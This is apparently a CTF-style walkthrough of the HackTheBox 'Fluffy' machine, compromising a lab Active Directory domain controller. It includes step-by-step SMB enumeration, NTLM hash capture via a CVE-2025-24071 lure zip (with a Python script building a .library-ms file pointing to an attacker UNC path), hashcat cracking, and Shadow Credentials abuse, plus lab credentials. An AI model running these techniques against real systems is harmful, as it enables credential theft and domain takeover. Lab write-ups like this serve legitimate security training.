Fluffy
IP Address: 10.10.11.69
Machine Information
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!
Challenge
Nmap
First, let's identify the open ports and the services running on the target.
sudo nmap -sS -sV -sC -vv -T5 10.10.11.69 -oA nmap/Fluffy
From the nmap result it is evident that the target is a Domain Controller of a Windows Active Directory domain, and that the domain name is fluffy.htb.
Let's add the domain name to our /etc/hosts file so that we can address the DC by name.
sudo nano /etc/hosts
and add the following contents:
<--IP Address--> fluffy.htb
SMB Enumeration
The easiest place to start enumerating is the SMB shares. As a first test, we attempt to log in as the guest account with an empty password using nxc (NetExec).
nxc smb fluffy.htb -u "guest" -p ""
The output shows that the guest account is accepted over SMB without a password. Let's take advantage of this by listing the shares the guest account can see.
nxc smb fluffy.htb -u "guest" -p "" --shares
The IPC$ share is readable by the guest account. That alone is enough to enumerate domain accounts by brute-forcing RIDs with nxc.
nxc smb fluffy.htb -u "guest" -p "" --rid-brute
Dump this list into a file and reduce it to bare usernames. Only the lines tagged SidTypeUser are accounts; the grep drops the banner and group lines that would otherwise end up in the wordlist as junk.
nxc smb fluffy.htb -u "guest" -p "" --rid-brute > usernames.txt
grep SidTypeUser usernames.txt | cut -d '\' -f 2 | cut -d ' ' -f 1 > updated-usernames.txt
In the list we find j.fleischman, the account whose credentials are given in the machine description.
Username: j.fleischman
Password: J0elTHEM4n1990!
Using this account, list the shares it can access.
nxc smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
The IT share is readable and writable by j.fleischman. Connect to it with smbclient (it prompts for the password) and look at what is inside.
smbclient //fluffy.htb/IT -U 'j.fleischman'
Inside the share there are several zip files and one PDF document. To analyse them further, download the files to your local machine with the get command.
get <--File Name-->
(Later we find out that we only need the upgrade_Notice.pdf file.)
Now to the PDF from the SMB share. It describes a recent pentest/audit of the domain controller and lists the CVEs that were found.
Among those CVEs, CVE-2025-24071 is the one we can use directly: a specially crafted archive makes Windows Explorer authenticate to an attacker-controlled SMB server when the archive is extracted, handing us the NTLMv2 response of whichever domain user opens it.
CVE-2025-24071
A working GitHub repository for exploiting CVE-2025-24071 is the one cloned below.
As a first step, let's clone this repository into our attacker's machine.
git clone https://github.com/Marcejr117/CVE-2025-24071_PoC.git
NTLM Hash
The usage of the tool is simple:
- Create the malicious zip file.
python3 PoC.py Fluffy <--Attacker's IP-->
- Set up a listener.
For that, we use Responder.py from this GitHub repository.
git clone https://github.com/lgandx/Responder.git
Now run Responder.py bound to the HackTheBox VPN interface (tun0).
sudo python3 Responder.py -I tun0
- Upload the ZIP file.
Open another terminal and connect to the IT share again (smbclient prompts for the password).
smbclient //fluffy.htb/IT -U 'j.fleischman'
Upload the file with the put command.
put exploit.zip exploit.zip
Shortly afterwards Responder shows the NTLMv2 hash of the user who opened the archive on the share.
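To make the "create a malicious zip file" step concrete, here is an added example of what the lure actually is; this is not the PoC.py from the repository above but a stand-alone illustration. The archive contains a `.library-ms` file (a Windows library definition) whose location is a UNC path on the attacker host; Explorer resolves that path when the archive is extracted, which is what triggers the SMB authentication Responder captures. The entry name `Fluffy.library-ms`, the share name `share` and the address 10.10.14.5 are assumptions. The `inspect_zip` function is the defender-side counterpart: it pulls the UNC targets back out of a suspicious archive.

```python
"""Build and inspect a CVE-2025-24071 style lure archive (added example, not the PoC)."""
import tempfile
import xml.etree.ElementTree as ET
import zipfile
from pathlib import Path
from typing import Dict, List

# Namespace of the Windows library description (.library-ms) format.
NS = "http://schemas.microsoft.com/windows/2009/library"

# Minimal library definition whose single location is the attacker's UNC path.
LIBRARY_MS_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{ns}">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{unc}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_library_ms(attacker_ip: str, share: str = "share") -> str:
    """Return the .library-ms XML pointing at \\\\attacker_ip\\share (share name is an assumption)."""
    unc = f"\\\\{attacker_ip}\\{share}"  # Explorer resolves this on extraction -> SMB auth to us
    return LIBRARY_MS_TEMPLATE.format(ns=NS, unc=unc)


def build_lure_zip(zip_path: Path, attacker_ip: str,
                   lure_name: str = "Fluffy", share: str = "share") -> str:
    """Write the lure archive and return the name of the .library-ms entry inside it."""
    entry = f"{lure_name}.library-ms"
    with zipfile.ZipFile(zip_path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry, build_library_ms(attacker_ip, share))
    return entry


def inspect_zip(zip_path: Path) -> Dict[str, List[str]]:
    """Defender side: map every .library-ms entry in an archive to the URLs it declares."""
    found: Dict[str, List[str]] = {}
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            root = ET.fromstring(zf.read(name))
            found[name] = [u.text or "" for u in root.iter(f"{{{NS}}}url")]
    return found


def demo(attacker_ip: str = "10.10.14.5") -> Dict[str, List[str]]:
    """Build a lure in a temp dir and read its UNC target back (round-trip check)."""
    with tempfile.TemporaryDirectory() as tmp:
        zpath = Path(tmp) / "exploit.zip"
        build_lure_zip(zpath, attacker_ip)
        return inspect_zip(zpath)


if __name__ == "__main__":
    print(demo())
```

Any archive whose `.library-ms` entries declare a `\\host\share` URL pointing outside your network is worth treating as hostile; the same check works on a mail gateway or in a sandbox before anyone extracts the file.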
Copy the hash into a text file (hash.txt) and crack it against rockyou.txt with hashcat. Mode 5600 is NetNTLMv2; hashcat usually autodetects it, but setting it explicitly avoids any ambiguity.
Crack the hash
hashcat -m 5600 hash.txt <--Location to your-->/rockyou.txt
Kudos! The hash cracks and we have the password of a new user, p.agila.
BloodHound
To understand the domain structure and the attack paths we can try next, we use BloodHound.
With p.agila's credentials, run the bloodhound-python collector, which connects to the domain controller and gathers the domain data.
bloodhound-python -u 'p.agila' -p '<--Password-->' -d fluffy.htb -ns 10.10.11.69 -c All --zip
Upload the generated zip file in the BloodHound web application.
Once uploaded, go to the Explore tab and search for the user p.agila@fluffy.htb.
Looking at this account's outbound object control, p.agila can modify the membership of the Service Accounts group (which is why we can add ourselves to it in the next step), and that group holds GenericWrite over several service accounts, among them winrm_svc.
BloodHound's Linux Abuse guidance for GenericWrite over a user points to the Shadow Credentials technique (writing a key credential to msDS-KeyCredentialLink), which we follow next.
Shadow Credentials
The blog post I am following for this exploit is this one.
According to the blog post, the first step is to make sure that p.agila is a member of Service Accounts, the group that holds GenericWrite over winrm_svc.
net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila" -S "10.10.11.69"
Following the Linux Abuse section in BloodHound, clone the pyWhisker tool onto the attacker machine.
git clone https://github.com/ShutdownRepo/pywhisker.git
Using this tool, we first list any KeyCredentials already present on the winrm_svc account.
python3 pywhisker.py -d "fluffy.htb" -u "p.agila" -p "<--Password-->" --target "winrm_svc" --action "list"
It is empty.
So let's add a new KeyCredential to the winrm_svc account and export the matching certificate and private key as PEM files.
python3 pywhisker.py -d "fluffy.htb" -u "p.agila" -p "<--Password-->" --target "winrm_svc" --action "add" --filename key --export PEM
Move the generated key_cert.pem and key_priv.pem to a suitable folder (the commands below assume ../Key/).
With our key attached to winrm_svc, we can authenticate as that account via PKINIT and request a TGT from the DC.
For that we use another toolkit, PKINITtools.
git clone https://github.com/dirkjanm/PKINITtools.git
Now request the TGT:
python3 gettgtpkinit.py -cert-pem ../Key/key_cert.pem -key-pem ../Key/key_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache
If you get the error minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great", your attacker machine's clock is too far from the DC's.
Kerberos tolerates about 5 minutes of skew by default, so adjust the time of your attacker machine (your Kali Linux) to match the DC.
One way is faketime, which runs a single command under a shifted clock without touching the system time.
sudo apt install faketime
faketime -h
To read the DC's current time, we use ntpdate in query-only mode.
ntpdate -q <--Domain Name-->
We only need the date and time fields from its output.
The combined command looks like this:
faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" python3 gettgtpkinit.py -cert-pem ../Key/key_cert.pem -key-pem ../Key/key_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache
The TGT is written to winrm_svc.ccache (gettgtpkinit.py also prints the AS-REP encryption key; keep it, other PKINITtools scripts use it).
On the attacker machine, point the Kerberos credential cache variable at this file so that tools authenticating as winrm_svc pick up the ticket. Note that faketime only shifts the clock for the process it wraps, so any later command that uses this ticket must run under the same faketime prefix, unless you actually synchronise the system clock with ntpdate (without -q).
export KRB5CCNAME=winrm_svc.ccache